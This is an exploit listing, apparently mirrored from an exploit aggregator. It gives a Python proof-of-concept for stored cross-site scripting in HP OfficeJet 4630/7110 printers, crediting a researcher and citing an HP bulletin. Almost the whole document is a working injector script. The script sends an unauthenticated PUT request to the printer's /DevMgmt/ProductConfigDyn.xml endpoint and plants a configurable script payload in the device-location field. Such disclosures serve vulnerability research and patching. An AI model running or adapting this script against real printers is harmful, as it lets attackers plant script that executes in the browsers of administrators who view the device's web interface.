Exploit HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting

Name: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting
Rating: 5 (126 reviews)
2021-08-25 | CVSS 0.0
## https://sploitus.com/exploit?id=PACKETSTORM:163908
# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)  
# Date: 01/08/2021  
# Exploit Author: Tyler Butler  
# Vendor Homepage: https://www8.hp.com/  
# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742  
# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630  
# Version: HP OfficeJet 7110 Wide Format ePrinter  
# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A  
  
# PoC:  
import requests  
import json  
from requests.exceptions import HTTPError  
  
target = 'http://192.168.223.1' # The IP of the vulnerable taget   
payload = '''<script>alert('XSS');</script>''' # The XSS injection payload you want to use   
path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command  
pre = '''  
<?xml version="1.0" encoding="UTF-8"?>  
<!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->  
<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">  
<prdcfgdyn2:ProductSettings>  
<prdcfgdyn:DeviceInformation>  
<dd:DeviceLocation>  
''' # The start of the request body  
post = '''  
</dd:DeviceLocation>  
</prdcfgdyn:DeviceInformation>  
</prdcfgdyn2:ProductSettings>   
</prdcfgdyn2:ProductConfigDyn>  
''' # The end of the request body   
body = pre + payload + post  
  
  
headers = {  
'Host':'192.168.223.1',   
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',  
'Accept':'*/*',  
'Accept-Language':'en-US,en;q=0.5',  
'Accept-Encoding':'gzip, deflate',  
'Content-Type':'text/xml',  
'Content-Length':str(len(body.encode('utf-8'))),  
'Origin':'https://192.168.223.1',  
'Connection':'close',  
'Referer':target,  
}  
  
print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')  
try:  
print('{!} Injecting payload :',payload)  
response = requests.put(target+path, headers = headers, data = body)  
response.raise_for_status()  
except HTTPError as http_err:  
print('{X}',f'HTTP error occurred: {http_err}')   
except Exception as err:  
print('{X}',f'Other error occurred: {err}')  
else:  
print('{!} Success!')